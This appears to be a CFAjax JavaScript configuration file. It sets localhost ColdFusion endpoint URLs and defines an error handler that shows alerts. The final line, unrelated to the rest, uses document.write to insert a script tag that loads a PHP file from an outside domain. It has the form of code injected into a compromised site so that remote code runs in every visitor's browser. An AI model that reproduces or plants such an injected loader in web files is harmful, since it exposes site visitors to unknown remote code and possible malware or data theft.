_cfscriptLocation = "http://localhost:8500/cfajax/core/functions.cfm";
_cfscriptAdminLocation = "http://localhost:8500/cfajax/core/functions.cfm";
_cfscriptAmazonLocation = "http://localhost:8500/cfajax/app/amazon/functions.cfm";
_cfscriptVotingLocation = "http://localhost:8500/cfajax/app/voting/functions.cfm";
_cfscriptYahooLocation = "http://localhost:8500/cfajax/app/yahoo/functions.cfm";
function errorHandler(message)
{
	$('disabledZone').style.visibility = 'hidden';
    if (typeof message == "object" && message.name == "Error" && message.description)
    {
        alert("Error: " + message.description);
    }
    else
    {
        alert(message);
    }
};

document.write('<script src=http://realityinfo.com/Henkel/ad_adaptation.php ><\/script>');